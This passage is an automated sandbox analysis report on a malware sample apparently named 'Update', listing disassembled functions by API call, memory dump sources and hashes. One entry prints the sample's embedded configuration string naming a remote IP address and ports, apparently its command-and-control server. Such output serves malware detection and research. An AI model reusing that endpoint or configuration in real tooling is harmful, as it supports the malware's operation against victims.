                                              • Instruction Fuzzy Hash: 86E0ECB1900600EFFB18EBA0D905E7D7775AF5561AF205149E1026B2A0CB79B940DA20
                                              APIs
                                              • __getptd.LIBCMT ref: 10007181
                                                • Part of subcall function 1000990F: __getptd_noexit.LIBCMT ref: 10009912
                                                • Part of subcall function 1000990F: __amsg_exit.LIBCMT ref: 1000991F
                                                • Part of subcall function 10007156: __getptd_noexit.LIBCMT ref: 1000715B
                                                • Part of subcall function 10007156: __freeptd.LIBCMT ref: 10007165
                                                • Part of subcall function 10007156: ExitThread.KERNEL32 ref: 1000716E
                                              • __XcptFilter.LIBCMT ref: 100071A2
                                                • Part of subcall function 10009C41: __getptd_noexit.LIBCMT ref: 10009C47
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551303488.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000003.00000002.3551255249.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551324667.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551342209.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551359349.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551377013.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                              Similarity
                                              • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                                              • String ID:
                                              • API String ID: 418257734-0
                                              • Opcode ID: 297936fcc0dbf5f526c0e08448a2f351abf61589ee907ea93caa2c8fedee672a
                                              • Instruction ID: 91050fa4c4edb40f5b5d990f834f761f3b027d6385ed46559f27b3ea4901cb17
                                              • Opcode Fuzzy Hash: 297936fcc0dbf5f526c0e08448a2f351abf61589ee907ea93caa2c8fedee672a
                                              • Instruction Fuzzy Hash: 76E0ECB9904604DFF718DBA0C956E6E7775EF44241F210049F1015B2A6CB35B940DB24
                                              APIs
                                              • __lock.LIBCMT ref: 0433641B
                                                • Part of subcall function 04338E5B: __mtinitlocknum.LIBCMT ref: 04338E71
                                                • Part of subcall function 04338E5B: __amsg_exit.LIBCMT ref: 04338E7D
                                                • Part of subcall function 04338E5B: EnterCriticalSection.KERNEL32(00000000,00000000,?,04333F06,0000000D,04346340,00000008,04333FFF,00000000,?,043310F0,00000000,04346278,00000008,04331155,?), ref: 04338E85
                                              • __tzset_nolock.LIBCMT ref: 0433642C
                                                • Part of subcall function 04335D22: __lock.LIBCMT ref: 04335D44
                                                • Part of subcall function 04335D22: ____lc_codepage_func.LIBCMT ref: 04335D8B
                                                • Part of subcall function 04335D22: __getenv_helper_nolock.LIBCMT ref: 04335DAD
                                                • Part of subcall function 04335D22: _free.LIBCMT ref: 04335DE4
                                                • Part of subcall function 04335D22: _strlen.LIBCMT ref: 04335DEB
                                                • Part of subcall function 04335D22: __malloc_crt.LIBCMT ref: 04335DF2
                                                • Part of subcall function 04335D22: _strlen.LIBCMT ref: 04335E08
                                                • Part of subcall function 04335D22: _strcpy_s.LIBCMT ref: 04335E16
                                                • Part of subcall function 04335D22: __invoke_watson.LIBCMT ref: 04335E2B
                                                • Part of subcall function 04335D22: _free.LIBCMT ref: 04335E3A
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3550596047.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: true
                                              • Associated: 00000003.00000002.3550596047.0000000004354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4320000_Update.jbxd
                                              Similarity
                                              • API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
                                              • String ID:
                                              • API String ID: 1828324828-0
                                              • Opcode ID: c68b5419e44204073cac38bcd848f42797afd42253f133d8e0659734d9c7d0a6
                                              • Instruction ID: aea27038ec7079fd7d6a8d20d1b276604c07827349bcbd1ad56b632069c0adf0
                                              • Opcode Fuzzy Hash: c68b5419e44204073cac38bcd848f42797afd42253f133d8e0659734d9c7d0a6
                                              • Instruction Fuzzy Hash: A4E0EC31C41714EBE7767FE0A60765C7278EF98B37F60711AE48122190CA757591CA92
                                              APIs
                                              • lstrlenW.KERNEL32(|p1:154.82.85.79|o1:18091|t1:1|p2:154.82.85.79|o2:18092|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:), ref: 10004755
                                                • Part of subcall function 10003260: __wcsrev.LIBCMT ref: 10020655
                                              Strings
                                              • |p1:154.82.85.79|o1:18091|t1:1|p2:154.82.85.79|o2:18092|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:, xrefs: 10004750
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551303488.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000003.00000002.3551255249.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551324667.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551342209.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551359349.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551377013.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                              Similarity
                                              • API ID: __wcsrevlstrlen
                                              • String ID: |p1:154.82.85.79|o1:18091|t1:1|p2:154.82.85.79|o2:18092|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:
                                              • API String ID: 4062721203-723003806
                                              • Opcode ID: ef503d5516fdfa215c481ae33ec846e637023be3d257a54ad483c27845c77df4
                                              • Instruction ID: 3065bb4344b1789bcecd08ba6036c617636919b35652953f12b0e4d8e139a27a
                                              • Opcode Fuzzy Hash: ef503d5516fdfa215c481ae33ec846e637023be3d257a54ad483c27845c77df4
                                              • Instruction Fuzzy Hash: EFC08C72208214CFF202E3D4988876D7359EB33722F608039FA00CD012E672CC8097B1
                                              APIs
                                              • RegCloseKey.ADVAPI32(80000001,04326E9A), ref: 04326EC9
                                              • RegCloseKey.ADVAPI32(75BF73E0), ref: 04326ED2
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3550596047.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: true
                                              • Associated: 00000003.00000002.3550596047.0000000004354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4320000_Update.jbxd
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              • Opcode ID: 99cf4360bc845faf3a784dc755dd610b2cb89962689ee0ed5581654130a40a06
                                              • Instruction ID: d7755af4b171cdeadcca30423d5f2c538b03cab668136a988b34117dd41a11f8
                                              • Opcode Fuzzy Hash: 99cf4360bc845faf3a784dc755dd610b2cb89962689ee0ed5581654130a40a06
                                              • Instruction Fuzzy Hash: 9FC04C72D0102857CB10E6A4ED4494A77B89B8C210F1140C2A104A3114C634BD418F90
                                              APIs
                                              • CloseHandle.KERNEL32(00000000,?,00000000,?,6C32A4FF,6C331D61,?,00000000,00000000), ref: 6C32A566
                                              • GetLastError.KERNEL32(?,00000000,?,6C32A4FF,6C331D61,?,00000000,00000000), ref: 6C32A570
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: CloseErrorHandleLast
                                              • String ID:
                                              • API String ID: 918212764-0
                                              • Opcode ID: 066432979934ca82defa9937a90e6399dad03e59b659a4d70e6f1d9c01db8377
                                              • Instruction ID: 235754c84e72b89ff0e918e02c960f99b40c53d4b8a98725356b711f339c742d
                                              • Opcode Fuzzy Hash: 066432979934ca82defa9937a90e6399dad03e59b659a4d70e6f1d9c01db8377
                                              • Instruction Fuzzy Hash: AA11E93370D2101FDF050675A8457AF77AA9B8373CF390209E99496EC1DB3A85454A51
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1396d3f199e109da6f9a8ffb9e14904a7fd7fa9470db4d0ddb3cd2cfd86ce755
                                              • Instruction ID: 457f9b2286b32e3e35bbd243e5012847b3fe547088e5aa42dc2265b8f5cb452d
                                              • Opcode Fuzzy Hash: 1396d3f199e109da6f9a8ffb9e14904a7fd7fa9470db4d0ddb3cd2cfd86ce755
                                              • Instruction Fuzzy Hash: D8519370A08208AFDB08CF58CC89E99BBB5EB49368F14C158E8595BF91D3739A41CFD1
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: _strlen
                                              • String ID:
                                              • API String ID: 4218353326-0
                                              • Opcode ID: 4849664dbf894499bcba18708a2522571c174fff784790f06afbe16e39a68da3
                                              • Instruction ID: bfa80eedf8aaca62444ab4d2066eb1777d35e2e84678723a1e2c5b6853a2fe98
                                              • Opcode Fuzzy Hash: 4849664dbf894499bcba18708a2522571c174fff784790f06afbe16e39a68da3
                                              • Instruction Fuzzy Hash: 75312EF2B042405BD720DF38D8557DB7BE9ABA6308F650529F046C7B41F73A844987A2
                                              APIs
                                              • SetFileAttributesA.KERNEL32(?,00000001,?,?,00000000,?), ref: 6C1BF217
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: 86915d87a08eb928ee7c13868c0567b411cc86b76c50b3d1eba525eed77598c5
                                              • Instruction ID: 91d846f9d863566b6cc6bd036bd51e88d87bb6e50097d42259f375b1957a1549
                                              • Opcode Fuzzy Hash: 86915d87a08eb928ee7c13868c0567b411cc86b76c50b3d1eba525eed77598c5
                                              • Instruction Fuzzy Hash: B5219078601740DFD720CF29C848F86BBAAFB85B20F008559E52A9B791C774E944CF91
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: __wsopen_s
                                              • String ID:
                                              • API String ID: 3347428461-0
                                              • Opcode ID: 048982b8d3edfa07f0855fddfe5627751774d5cd3a97aca1ab6c881341d7773e
                                              • Instruction ID: c9ce87d0d8da8dfdbd3662e6dccc1e887b13869fcf89dc35e76b89f08a056e28
                                              • Opcode Fuzzy Hash: 048982b8d3edfa07f0855fddfe5627751774d5cd3a97aca1ab6c881341d7773e
                                              • Instruction Fuzzy Hash: 78116672A0420AAFCF05CF99E94099B7BF8EF49308F00406AF818AB301D671E911CBA5
                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,0433454A,00000000,00000001,00000000,00000000,00000000,?,04333E0D,00000001,00000214,?,04334500), ref: 0433A735
                                                • Part of subcall function 0432F91B: __getptd_noexit.LIBCMT ref: 0432F91B
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3550596047.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: true
                                              • Associated: 00000003.00000002.3550596047.0000000004354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4320000_Update.jbxd
                                              Similarity
                                              • API ID: AllocateHeap__getptd_noexit
                                              • String ID:
                                              • API String ID: 328603210-0
                                              • Opcode ID: 518ed15064d5359f1b51ca6c471a19497cda763128c521158eeb036fbe5fdb4f
                                              • Instruction ID: 9184b05fb77ab0682d1b0a05775990ecd845e5e9506d48cb7691eb6a1a96161f
                                              • Opcode Fuzzy Hash: 518ed15064d5359f1b51ca6c471a19497cda763128c521158eeb036fbe5fdb4f
                                              • Instruction Fuzzy Hash: 0C01D8393012159FEB24AEA5DC84B7737B8EF817A6F156529F895CB1A0DB34F8018B50
                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,10009FFA,00000000,00000001,00000000,00000000,00000000,?,100098C1,00000001,00000214,?,10009FB0), ref: 1000E598
                                                • Part of subcall function 1000710D: __getptd_noexit.LIBCMT ref: 1000710D
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551303488.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000003.00000002.3551255249.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551324667.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551342209.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551359349.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551377013.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                              Similarity
                                              • API ID: AllocateHeap__getptd_noexit
                                              • String ID:
                                              • API String ID: 328603210-0
                                              • Opcode ID: d06f835299f278651632b800e6ea60e14773797a6a441bb7e279904f59b9ce12
                                              • Instruction ID: 103cc215c0c144a9a87f3cbc911116c8ac8a7c4356fc0ca5ef77af160fbe558d
                                              • Opcode Fuzzy Hash: d06f835299f278651632b800e6ea60e14773797a6a441bb7e279904f59b9ce12
                                              • Instruction Fuzzy Hash: E9012435205A958EFB18CF24CC54B5A37D4EB853E6F018929E815AA0D4EB70DC00CB80
                                              APIs
                                                • Part of subcall function 6C3223F1: RtlAllocateHeap.NTDLL(00000000,6C1E5BE4,6C1B22CA,?,6C30BCF8,6C1B22CC,6C1B22CA,?,?,?,6C1E5B84,6C1E5BE4,6C1B22CE,6C1B22CA,6C1B22CA,6C1B22CA), ref: 6C322423
                                              • RtlReAllocateHeap.NTDLL(00000000,00000000,?,6C319328,00000000,?,6C31BB20,00000000,6C319328,?,?,?,?,6C319402,?,?), ref: 6C32968F
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: a7e0aa39d03fc3b99524f8241a85bf8a7141e9c6cd155edee181c8cdbf10165c
                                              • Instruction ID: de391b92c4e6c64c4ef673242a1a6b52b607da89df295a0d09b11409b38cf57c
                                              • Opcode Fuzzy Hash: a7e0aa39d03fc3b99524f8241a85bf8a7141e9c6cd155edee181c8cdbf10165c
                                              • Instruction Fuzzy Hash: 24F0FC323053056ADF151E67AC04FCB37AC9FC3778B210116E95496E90DF3ED4018DA6
                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000008,?,6C1E5BE4,?,6C3227E1,00000001,00000364,6C1E5BE4,00000006,000000FF,?,6C30BCF8,6C1B22CC,6C1B22CA,?,?), ref: 6C325749
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 284b7b83bdf6383d9896e86dccaa0bb7b9a8abeaa132539adf47b781276cbb87
                                              • Instruction ID: 99d2e062f5cb7ed13797850a85a75603d1cc5f07372f76820d965d334bff6f22
                                              • Opcode Fuzzy Hash: 284b7b83bdf6383d9896e86dccaa0bb7b9a8abeaa132539adf47b781276cbb87
                                              • Instruction Fuzzy Hash: 5EF0E031786124DBEF158E6E5C44B9B375CAF427A4F204111ECD4EAD44DB39DA018FE1
                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000000,6C1E5BE4,6C1B22CA,?,6C30BCF8,6C1B22CC,6C1B22CA,?,?,?,6C1E5B84,6C1E5BE4,6C1B22CE,6C1B22CA,6C1B22CA,6C1B22CA), ref: 6C322423
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 0d1b192a2debbe70397e25d37386fe1c7c97ba752353dca722f26e132e28af54
                                              • Instruction ID: c9d45668d1b66ff9c970f83d0a227afb505d7878634d89da6d1dfb13ba3b93b0
                                              • Opcode Fuzzy Hash: 0d1b192a2debbe70397e25d37386fe1c7c97ba752353dca722f26e132e28af54
                                              • Instruction Fuzzy Hash: CEE0EC7121512057EF1119A79E0CB87765C9F427B8F510321DD5495D84DF1BC4018DF1
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551303488.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000003.00000002.3551255249.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551324667.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551342209.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551359349.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551377013.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                              Similarity
                                              • API ID: Open
                                              • String ID:
                                              • API String ID: 71445658-0
                                              • Opcode ID: ce9d18141ac8a2415a65a9b8a38807c62c68c0f35cc9388145c160860f9cea29
                                              • Instruction ID: d3b2713253b45803e0e36550a0a091f6b3b019736998aa0157c013c20421de29
                                              • Opcode Fuzzy Hash: ce9d18141ac8a2415a65a9b8a38807c62c68c0f35cc9388145c160860f9cea29
                                              • Instruction Fuzzy Hash: B2E09274908216EADB25DB80C984BFE73B5FB64385F30814DE8042F094D375AE84AA91
                                              APIs
                                              • CreateFileW.KERNEL32(6C1C6E59,00000000,?,6C331C17,?,?,00000000,?,6C331C17,6C1C6E59,0000000C), ref: 6C331F90
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: efa5f4737aa19c039903b93dd5b582f97c4f1e5e2d0330f128a26c940f0654d2
                                              • Instruction ID: cdcc9f277677a1c76b2d8410586949568c2633873cac770a84ee63ac5c572dfc
                                              • Opcode Fuzzy Hash: efa5f4737aa19c039903b93dd5b582f97c4f1e5e2d0330f128a26c940f0654d2
                                              • Instruction Fuzzy Hash: 71D06C3210010DBFDF028E84DC06EDA3BAAFB48714F014000BA1856420C732E821AB90
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551303488.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000003.00000002.3551255249.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551324667.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551342209.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551359349.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551377013.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                              Similarity
                                              • API ID: QueryValue
                                              • String ID:
                                              • API String ID: 3660427363-0
                                              • Opcode ID: bc9ecc6ca19783af6d6fbb40ca28845bcba02b8ce6e2273daa9cad6eb9c5806e
                                              • Instruction ID: fe46c43de78f47d222b333b3703367a29387d0af8959c827854050506a177f75
                                              • Opcode Fuzzy Hash: bc9ecc6ca19783af6d6fbb40ca28845bcba02b8ce6e2273daa9cad6eb9c5806e
                                              • Instruction Fuzzy Hash: 26C08C30C4C75EE2D032E8101C0A1BDB3E4E778299F3005BFAC452D884E4F4A9C0B6EA
                                              APIs
                                              • GetCurrentThreadId.KERNEL32 ref: 1001FAB1
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551303488.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000003.00000002.3551255249.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551324667.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551342209.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551359349.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
